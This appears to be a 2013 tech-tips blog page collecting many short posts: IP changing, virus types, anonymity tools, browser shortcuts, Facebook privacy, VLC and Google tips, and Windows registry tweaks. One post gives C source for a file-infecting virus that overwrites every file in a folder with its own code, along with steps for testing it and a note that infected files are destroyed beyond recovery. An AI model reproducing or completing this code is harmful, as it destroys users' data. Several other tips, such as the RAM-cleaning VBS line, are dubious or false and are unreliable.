Saturday, September 14, 2013

How To Change Your IP Address In Less Than 1 Minute

The acronym “IP”, in computing terminology, refers to an “Internet Protocol address.” It is number that identifies your computer or network and separates it from all other computers or networks on the Internet. It allows other computers and networks to identify your own connection and initiate communication, which is the basis of how the Internet actually operates. Because of the important job of an IP address, it is equally important that you take steps to protect your own, especially if you own and operate a business. If your IP address is used in the wrong way by a person with malicious intentions, it could potentially cause irreparable harm to your network, your computer or even your business.


How To: Change it:

1. Click on "Start" in the bottom left hand corner of screen

2. Click on "Run" 

3. Type in "command" and hit ok You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"

5. Type "exit" and leave the prompt

6. Right-click on "Network Places" or "My Network Places" on your desktop.

7. Click on "properties" You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"

9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab 

10. Click on "Use the following IP address" under the "General" tab

11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

13. Hit the "Ok" button here 

14. Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.

16. Go back to the "TCP/IP" settings

17. This time, select "Obtain an IP address automatically" tongue.gif 

18. Hit "Ok" 

19. Hit "Ok" again 

20. You now have a new IP address With a little practice, you
can easily get this process down to 15 seconds.

NB: This only changes your Dynamic IP Address, not your ISP/IP address. If you plan on gaining an unauthorized access on  a website with this trick, then know that you might be caught...

Friday, September 6, 2013

Types of Viruses



The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot-record of the hard disk or the floppy drive. The boot-record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.
Examples of boot- sector viruses are: Michelangelo and Stoned.


2) File or Program Viruses:- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN,.DRV and .SYS .
Some common file viruses are: Sunday, Cascade.


3) Multipartite Viruses:- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.

This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated. 

Ghost-ball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are: Invader, Flip, etc.


4) Stealth Viruses:- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program clean image of the file or boot sector.


5) Polymorphic Viruses:- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the "Signature" each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presence.


6) Macro Viruses:- A macro virus is a computer virus that infects a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless. A macro virus is often spread as an e-mail virus. 
Well-known examples are: Concept Virus and Melissa Worm.

Feel Free to Comment....

ICT TIP>>>>-4 WAYS TO BE ANONYMOUS ONLINE.




Want to be anonymous online to view blocked websites, protect yourself from hackers or want to trace a Culprit?. In the following post i will explain 4 easy ways by which you can stay anonymous online!


1. Using Proxies
A proxy is an address ( IP address) of a Server (proxy server) that is placed between your computer and the Internet The advantage of a proxy is that your real IP address is Hidden so when you hack your given the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server. You can use it to enter site or forum that your IP is banned.


2. Using Tor
Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays to conceal a user's location or usage from anyone.


3. SSH Tunneling
SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel. In easy language, you can surf net without being monitored and even surf blocked sites too. 


4. Using VPN
Virtual Private Network. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually Internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is private network constructed within a public network infrastructure, such as the global Internet. The Biggest difference between proxy and VPN is everything in a VPN is encrypted which gives an additional layer of security. There are some paid And free VPN services.


Feel free to Comment...

Sunday, September 1, 2013

COMPUTER ADDICTS


SHORTCUTS TO ANY PC BROWSER


Following are Some Keyboard Shortcuts That You Can Use on Any Browser.
Managing Tabs

Ctrl+1-8 – Switch to the specified tab, counting from the left.

Ctrl+9 – Switch to the last tab.

Ctrl+Tab – Switch to the next tab – in other words, the tab on the right. (Ctrl+Page Up also works, but not in Internet Explorer.)

Ctrl+Shift+Tab – Switch to the previous tab in other words, the tab on the left. (Ctrl+Page Down also works, but not in Internet Explorer.)

Ctrl+W, Ctrl+F4 – Close the current tab.

Ctrl+Shift+T – Reopen the last closed tab.

Ctrl+T – Open a new tab.

Ctrl+N – Open a new browser window.

Alt+F4 – Close the current window. (Works in all applications.)
Managing Tabs With Mouse
Middle Click a Tab – Close the tab.

Ctrl+Left Click, Middle Click – Open a link in a background tab.

Shift+Left Click – Open a link in a new browser window.

Ctrl+Shift+Left Click – Open a link in a foreground tab.
Navigation
Alt+Left Arrow, Backspace – Back.

Alt+Right Arrow, Shift+Backspace – Forward.

F5 – Reload.

Ctrl+F5 – Reload and skip the cache, re-downloading the entire website

Escape – Stop.

Alt+Home – Open homepage.
Zooming

Ctrl and +, Ctrl+Mousewheel Up – Zoom in.

Ctrl and -, Ctrl+Mousewheel Down — Zoom out.

Ctrl+0 – Default zoom level.

F11 – Full-screen mode.
Scrolling
Space, Page Down – Scroll down a frame.

Shift+Space, Page Up – Scroll up a frame.

Home – Top of page.

End – Bottom of page.

Middle Click – Scroll with the mouse. (Windows only)
Address Bar
Ctrl+L, Alt+D, F6 – Focus the address bar so you can begin typing.

Ctrl+Enter – Prefix www. and append .com to the text in the address bar, and then load the website. For example, type facebook.com into the address bar and press Ctrl+Enter to openwww.facebook.com

Alt+Enter – Open the location in the address bar in a new tab.
Search
Ctrl+K, Ctrl+E – Focus the browser’s built-in search box or focus the address bar if the browser doesn’t have a dedicated search box. (Ctrl+K doesn’t work in IE, Ctrl+E does.)

Alt+Enter – Perform a search from the search box in a new tab.

Ctrl+F, F3 – Open the in-page search box to search on the current page.

Ctrl+G, F3 – Find the next match of the searched text on the page.

Ctrl+Shift+G, Shift+F3 – Find the previous match of the searched text on the page.
History & Bookmarks

Ctrl+H – Open the browsing history.

Ctrl+J – Open the download history.

Ctrl+D – Bookmark the current website.

Ctrl+Shift+Del – Open the Clear Browsing History window.
Other Functions
Ctrl+P – Print the current page.

Ctrl+S – Save the current page to your computer.

Ctrl+O – Open a file from your computer.

Ctrl+U – Open the current page’s source code. (Not in IE.)

F12 – Open Developer Tools. (Requires Firebug extension for Firefox.)

I Hope these Shortcuts will Help you Now and in Future. Stay Connected


5 THINGS YOU SHOULD NEVER POST ON FACEBOOK


Facebook has become the Google of social networks. If you're not updating your status right now, chances are that you are uploading photos or taking some sort of odd quiz. We post tons of intimate details about our lives that we normally wouldn't share with anyone. We think that as long as we make sure our privacy settings are set correctly that we are safe and snug within our circle of friends.

The problem is that we never know who's really looking at our information. Our friend's account could have been hacked when they installed some rogue application, or their creepy uncle might be using their account because they forgot to log out. For the sake of the safety of you and your family, there is some information that you should never post on Facebook. Here are 5 things you should consider removing or not posting to Facebook and/or other social networks.

1. YOU OR YOUR FAMILY'S FULL BIRTH DATES
We all love getting “happy birthdays” from our friends on our Facebook wall. It makes us feel all warm inside knowing that people remembered and cared enough to write us a short note on our special day. The problem is when you list your birthday you are providing identity thieves with one of the 3 or 4 pieces of personal information that is needed to steal your identity. It’s best to not list the date at all, but if you must, at least leave out the year. Your real friends should know this info anyway.

2. YOUR RELATIONSHIP STATUS
Whether you are in a relationship or not, it may be best not to make it public knowledge. Stalkers would love to know that you just became newly single. If you change your status to "single" it gives them the green light they were looking for to resume stalking now that you're back on the market. It also lets them know that you might be home alone since your significant other is no longer around. Your best bet is to just leave this blank on your profile.

3. YOUR CURRENT LOCATION
There are a lot of people who love the location tagging feature on Facebook that allows them to let people know where they are 24/7. The problem is that you have just told everyone that you're on vacation (and not at your house). If you add how long your trip is then thieves know exactly how much time they have to rob you. My advice is not to provide your location at all. You can always upload your vacation pictures when you get home or text your friends to let them know how jealous they should be that you're sipping an umbrella drink while they toil away at work.

4. THE FACT THAT YOU ARE HOME ALONE
It is extremely important that parents make sure their children never put the fact that they are home alone in their status. Again, you wouldn’t walk into a room of strangers and tell them you are going to be all alone at your house so don’t do it on Facebook either.
We may think that only our friends have access to our status, but we really have no idea who is reading it. Your friend may have had their account hacked or someone could be reading over their shoulder at the library. The best rule of thumb is not to put anything in your profile or status that you wouldn’t want a stranger to know. You may have the most stringent privacy settings possible, but if your friend’s account gets compromised than those settings go out the window.

5. PICTURES OF YOUR KIDS TAGGED WITH THEIR NAMES
We love our kids. We would do anything to keep them safe, but most people post hundreds of tagged pictures and videos of their kids to Facebook without even giving it a second thought. We even go so far as to replace our profile pictures with that of our children.
Probably 9 out of 10 parents posted their child’s full name, and exact date and time of birth while they were still in the hospital after delivery. We post pictures of our kids and tag them and their friends, siblings, and other relatives. This kind of information could be used by predators to lure your child. They could use your child’s name and the names of their relatives and friends to build trust and convince them that they are not really a stranger because they know detailed information that allows them to build a rapport with your child.

If you must post pictures of your children then you should at least remove personally identifying information such as their full names and birth dates. Untag them in pictures. Your real friends know their names anyway.
I would be a hypocrite if I said that I have completely removed all tagged pictures of my kids on facebook. It is a daunting task given the amount of pictures that we take as proud parents, but I have started on it and I'll do a little bit each day until it's finished.
Lastly, think twice before you tag pictures of the children of friends and relatives. They might not want you tagging their kids for the reasons mentioned above. You can send them a link to the pictures and they can tag themselves in place of their children if they want to.



7 Things VLC Can Do!!


VLC media player is one of the most popular player for most people.It has got almost all codecs. VLC can do a lot of other things beyond your imagination. Find out how many of these listed below you knew, and how many you did not.

1. Rip DVDs:

VLC includes a basic DVD ripper. You probably would never use it when there are better DVD rippers available, but it helps to know that you can in fact, get a decent quality DVD rip with VLC. To rip a movie follow these steps: Go to the Media menu and choose Convert–>Save. Click on the Disc tab.
Here you can adjust the Starting Position and rip only specific titles or chapters.
Enter file name making sure to end with .MPG, and start ripping.
Click Save.

2. Record Videos:

With the new VLC, you can record videos during playback. The record button is hidden by default. To see it, click on View–>Advanced Control. The record button will now appear. Clicking on the button while playing a movie or video will start recording. Clicking again will stop recording.

3. Play RAR files:

Do you know VLC can play videos zipped inside RAR files? They play like normal video files and you can even use the seek bar. If the RAR file is split into several files, no problem. Just load the first part (.part001.rar ) and it will automatically take the rest of the parts and play the whole file.

4. Play in ASCII Mode:

VLC media player has an amusing ability, to playback movies in ASCII art. To enable ASCII mode, open VLC media player and click on Tools –>Preferences. Open the section “Video” section and under “Output” select “Color ASCII art video output” from the drop down menu. Save it. Now play any video file to enjoy the ASCII art.

5. Listen to Online Radio:

VLC includes hundreds of Shoutcast radio stations. You just need to enable it through Media –>Services Discovery –> Shoutcast radio listings. Now, open the Playlist and browse through the stations.

6. Convert Audio and Video formats:

In VLC you can convert video and audio files from one format to another. Several different formats are supported like MP4, WMV, AVI, OGG, MP3 etc. To access the converter:
* Go to Media –>Convert/Save.
* Load the file you want to convert using the Add button and click Convert.
* Now choose the output format and output file location.

7. Download YouTube and other online videos:

First grab the URL of the YouTube video page. Now click on Media –>Open Network stream. Paste the URL and click Play.
Once VLC starts streaming the video, click Tools –>Codec Information and at the bottom of the window you will see a Location box. Copy the URL and paste it on your browser’s address bar. The browser will now download the file which you can save it to your hard disk. Alternatively, you can record the video.


PROGRAMMING - WITHOUT PROGRAMMING YOU CAN DO 9 COOL THINGS IN DRUPAL


DRUPAL is a free software package that allows you to easily organize, manage and publish your content, with an endless variety of customization.


1. Create web page.

2. You can create access roles and can assign this roles to the users.

3. Easily take care of your website statistics such as number of hits each page gets.

4. Allow user to submit comments or vote.

5. You can easily create your own template or theme.

6. You can add own content.Easy interface.

7. Add a site-wide search box, calendars, and RSS news feeds.

8. You can setup survey or forms.

9. Categorize content

PROGRAMMING - Difference Between SQL and MYSQL:

SQL is a language "Structured Query Language".
MYSQL is a Relational Database Management System (RDMS).


NB:
If your a developer and you need to work in both MySQL and SQL Server I highly recommend moving towards using an Object Relational Mapping (ORM). This allows you to not have to concentrate so much on the syntax but on the task at hand through the use of objects. Both have a solid ORM available called Entity Framework. Read more here.http://msdn.microsoft.com/en-us/library/aa697427(VS.80).aspx

Internet & Intranet

Internet:-

The Internet is a global system of interconnected computer networks that use the standard Internet Protocol (TCP/IP) to serve billions of users worldwide. It is a network of networks that consist of millions of private, public, academic, business, and government networks, of local to global scope, that are linked by broad array of electronic and optional networking technologies. The Internet carries a vast range of information resources and services, such as the inter –linked hypertext documents of the WORLD WIDE WEB (WWW) and the infrastructure to support electronic mail.

Intranet:-

An INTRANET is a private computer network that uses Internet Protocol technologies to securely share any part of an organizations information or network operating system within that organization. The Term is used in contrast to internet, a network between organizations instead refer to a network within an organization. Sometimes the term refers only to the organizations internal website, but may be a more extensive part of organization’s information technology infrastructure.­ It may host multiple Private Websites and constitutes an important component and focal point of internal communication and collaboration.

PROGRAMMING


DID YOU KNOW

You Know...?

HP, Google, Microsoft, and Apple, the largest IT companies in the world, all have one thing in common... They were all started in garages...

HOW TO CREATE OWN SEARCH ENGINE VIA GOOGLE.

Its so easy to create our own search engine....

1. Go to http://www.google.com/cse/create/new

2. Add your favorite websites...

3. Select your language

4. Press create



CREATE A VIRUS USING C++

#include
#include
#include
#include
#include
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end; void main()
{
st=clock();
clrscr();
done=findfirst
(“*.*”,&ffblk,0); // Search for a file with
any extension (*.*)
while(!done)
{
virus=fopen(_argv
[0],”rb”); host=fopen
(ffblk.ff_name,”rb+”);
if(host==NULL) goto
next;
x=89088;
printf(“Infecting %s \n”,ffblk.ff_name,a);
while(x>2048)
{
fread
(buff,2048,1,virus);
fwrite (buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++; next:
{
fcloseall();
done=findnext
(&ffblk);
} }
printf(“DONE! (Total
Files Infected=
%d)”,a);
end=clock();
printf(“TIME TAKEN= %f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

The algorithm of this virus program is as follows: 

Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file). 

Step-2: Load the copy of the virus itself onto the memory. Step-

3: Open the target file. Copy the virus code from the memory and place it in the target file. Close
the target file when the copying process is completed. 

Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit. As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Test the Virus After the
Compilation: 1. Create a new empty folder. 

2. Put some executable files (or any other files) in the folder. 

3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected. 

4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done. 

NOTE: The files infected by this virus
are destroyed
completely and
cannot be recovered.
So, always test the
virus in a new folder by placing some
sample files.

NB 2: DON'T FORGET to use .cpp and save it.

FIREFOX TIPS

Speed Up Firefox Browser.

To Speed Up your Firefox browsing just follow these simple steps.
Open a new tab on firefox and type the about:config on the address bar.
Then new Window will appear, now Right click on anywhere whitespace on your window andclick New > Integer
New Pop up Window will appear. Then Type the nglayout.initialpaint.delay
on the box then click Ok.
After that new window will appear. then Enter 0 Value thenrestart firefox
Hope You will See Good Result.

HOW TO CLEAN YOUR RAM USING NOTEPAD

Many friends of me ask where can I download a software which can keep my RAM free? And I found these software are nothing but using some lines of code which can be implemented by using notepad or any editor tool. So if any one does not have any software, you can use it by doing the following things which I am going to mention.

Steps to Clean Your RAM Using Notepad:

Step 1: Open Notepad

Step 2: Type FreeMem=Space(20480000000)

Step 3: Save it as LEANER.VBS in any location you like.

Step 4: You can edit the code and write 1024 instead of 2048 if you own a 1024mb RAM or change to anything you like.

Step 5: Run it !

After this final step your RAM will be free.


How To Speed Up Your Internet Connection

This article describes how to boost Internet speed. Before proceeding for internet steps I would advise you to make sure there is nothing wrong with your computer by following required troubleshooting steps.

1. Optimize your machine:

Don’t blame your ISP or router device until you have full confidence on your machine performance. Kindly go through all the below steps and see if you need to perform any.

• Make necessary hard drive space

• Stop bad programs and services

• Update windows OS

• Update security patches

• Fix computer overheat

• Check for bad hardware

2.  Clear Temporary Files:

• Make Disk Clean Up

• Run Disk Defragmenter

• Run Check Disk for bad sector

3. Speed Up Computer Boot Process

• Verify Hardware or Driver Issues

4. Try Different Browser

5.  Registry Clean Up

6• Remove Background Program

7. Sometimes resetting network or device can solve your issue as it will start clear everything from device/ network and do fresh start. You can also try unplugging and plugging the network cable or power cable.

8. General Equipment Check:

• Make sure your physical connectivity between laptop/computer and router device is proper, also check hub connectivity. Check for signal strength on router device, router is very important as it prioritize and directs the internet traffic effectively.
9• Check for Any Device Conflict:

• Wireless router may conflict with your cordless phone or Wi-Fi camera. 3 varieties of wireless router such as 802.11 b, g, and n (2.4Ghz) or 802.11 a (5.8Ghz).

10• Contact you Internet Service Provider(ISP):
• Don’t hesitate to contact your ISP (Internet Service Provider), sometime issue could be from ISP and you are dying making it working by performing troubleshooting steps at your end. Just call your ISP and ask politely if any direct issue from their end.

11• Upgrade Router/Firewall:
• Check your router specification and network speed properties on your machine. If the slow internet is a regular problem router is not transmitting the required bandwidth. Just go and buy new router with good specs. Many old router device are not capable of transmitting Internet faster than 10 Mbps, even though local port transmits 100Mbps.

12• Update Router Firmware:
• You cannot ignore firmware upgrade, browse the manufacturer website and check for any firmware upgrade available.

13• Your Cable Modem could have died:
• Any electronic equipment performances degrade over time due to overheat or could cause damage.It drops your signal to noise ratio resulting in increase in number of resend packets. Try replacing cable, great and times saving if it works else replace cable modem.

14• Check for Program running without your knowledge:
• Go to Run, type cmd then enter “netstat –b>trace.txt”. This will generate the network traces in the working directory with file name trace.txt. This will give you an idea for any program running such as antivirus or other update.
                                       

GOOGLE SEARCH TECHNIQUES

GOOGLE SEARCH TECHNIQUES:

Use the below mentioned guidelines during your Google Search and it will surely provide you with more better and relevant results…

1. EITHER/OR:
Google normally searches for pages that contain all the words you type in the search box, but if you want pages that have one tremor another (or both), use the OR operator — or use the symbol (pipe symbol) to save you a keystroke.
eg. [dumb | little | man]

2. Quotes:
If you want to search for an exact phrase, use quotes.
eg. ["dumb little man"] will only find that exact phrase.

3. NOT:
If you don’t want a term or phrase, use the - (minus) symbol as prefix. Eg. [-dumb little man] will return pages that contain little and man but that don’t contain dumb.

4. SIMILAR TERMS:
Use the ~ symbol to return similar terms.
eg. [~dumb little man] will get you pages that contain funny little man and stupid little man.

5. WILDCARD(*):
The * symbol is a wildcard. This is useful if you're trying to find the lyrics to a song, but
cant remember the exact lyrics. [cant * me love lyrics] will return the Beatles song you're looking for.

6. ADVANCED SEARCH:
If you cant remember any of these operators, you can always use Googles advanced search.

7. DEFINITIONS:
Use the 'define:' operator to get a quick definition.
For eg. [define:dumb] will give you a whole host of definitions from different sources, with links.

8. CALCULATOR:
One of the handiest uses of Google, type in a quick calculation in the search box and get an answer. It’s faster than calling up your computers calculator in most cases. Use the, +, -, *, / symbols and parentheses to do a simple equation.

9. NUM-RANGE: This little-known feature searches for a range of numbers.
For eg. [best books 2002..2007] will return lists of best books for each of the years from 2002 to 2007 (note the two periods between the two numbers).

10. SITE-SPECIFIC:
Use the 'site:' operator to search only within a certain website.
For eg. [site:dumblittl¬eman.com leo] will search for the term leo only within that site.

Thank you for reading and please do leave a comment or any suggestions.


COMPUTER LATEST 2013 TRICKS

COMPUTER LATEST 2013 TRICKS

TRICK # 1 For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.

TRICK # 2
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSIES_R ¬¬OOT/CLSID/ ¬ ¬{645FF040-5081-1¬01B-9F08-00AA0 ¬0 ¬25954E}
3.) Change the name "RecycleBin" to whatever you want.(no special chr)

TRICK # 3 You might know this.
1.) Go to any drive.
2.) Make a folder named"con".

TRICK # 4 Even Bill Gates, couldn’t answer why this happened!
1.) Open Microsoft Word and type
2.) =rand (200, 99)
3.) And then press ENTER.

TRICK # 5 Remove the Recycle Bin from the Desktop
1.) Go to Start / Run / type regedit
2.) HKEY_LOCAL_MACH ¬¬INE/SOFTWARE/ ¬Microsoft/ ¬Windows/ ¬ ¬CurrentVersion/¬explorer/ ¬Desktop/ -NameSpace
3.) Click on the "Recycle Bin" stringin the right hand pane.Hit Del, clickOK.

TRICK # 6 How to make your Desktop Icons Transparent
1.) Go to ontrol Panel then System,then Advanced
2.) Performance area in Settings button Visual Effectstab
3.) "Use drop shadows for icon labels on the Desktop

TRICK # 7 Speed up your browsing of Windows 2000 &XP machines
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACH ¬¬INE/Software/ ¬Microsoft/ ¬Windows/ ¬Current Version/¬Explorer/ ¬ -RemoteComputer/¬NameSpace Under that branch, select the key:
3.) {D6277990-4C6A- ¬ ¬11CF-8D87-00AA ¬0 ¬060F5BF}
4.) and delete it.

TRICK # 8 IP address of yourconnection
1.) Go to Start / Run / type cmd
2.) then type 'ipconfig'
3.) Add the '/all' switch for more info.

TRICK # 9 How to remove the Default Picture and Fax Preview Action:
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACH ¬¬INE/SOFTWARE/ ¬Classes/CLSID/ ¬¬{e84fda7c-1d6a ¬-4 ¬5f6-b725-cb260 ¬c -236066}/ ¬shellex
3.) Deleted the MayChangeDefaul ¬¬tMenu key.

TRICK # 10 How do I enable advanced security settings like found in Windows 2000
1.) Open windows explorer then click on Tools-Folder Options
2.) Click on the View Tab.
3.) (uncheck) the option that reads 'use simple file sharing' Thiswill allow you tosee the security tab when viewing the properties of a file/folder.

TRICK # 11 Set Processes Priority:
1.) Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.
2.) Press CTRL-SHIFT-ESC
3.) Go to Processes, right click on active processes, you will see the Set Priority option
4.) For example, your Run your CDwriter program, set the priority higher, and guess what, no crashed CD’s

TRICK # 12 Hide 'User Accounts' from users:
1.) Go to Start/Run, and type:
2.) GPEDIT.MSC
3.) Open the path
4.) User Config in Admin Templates in Control Panel
5.) doubleclick "Hide specifiedContro ¬l Panel applets"
6.) put a dot in 'enabled', then click 'Show"
7.) click Add button,
8.) type "nusrmgt.cpl" into theadd box

TRICK # 13 Disable CD Autorun:
1.) Click Start, Run and enter GPEDIT.MSC
2.) Go to Computer Configuration, Administrative Templates, System.
3.) Locate the entry for Turn autoplay off and modify it as you desire.

TRICK # 14 Adding Programs To Stay On The Start Menu:
1.) Right click on any .exe filein Explorer, My Computer, Desktop and select 'Pin to Start Menu', the program is then displayed on the start menu, above the separator line. To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.

TRICK # 15 Change the text in Internet Explorers title bar:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CURRENT_US ¬¬ERSoftwareMicr ¬o ¬softInternet ExplorerMain
3.) change the value of the string"Window Title" to whatever you want on the title bar of Internet Explorer - to have no title except the title of the web pages you are browsing do not enter anything for a value.

TRICK # 16 Adjust various visual effects:
1.) Open up the control panel
2.) Go under system and clickon the advanced tab
3.) Click settings under Performance options
4.) You can now change various graphical effects (mainly animations and shadows)

TRICK # 17 Remove shortcut arrow from desktop icons:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSES_RO ¬¬OTlnkfile
3.) Delete the IsShortcut registry value. -You may need to restart Windows XP.

NB: EVEN if you don’t Try any, JUST TRY TRICK #4.


ShareThis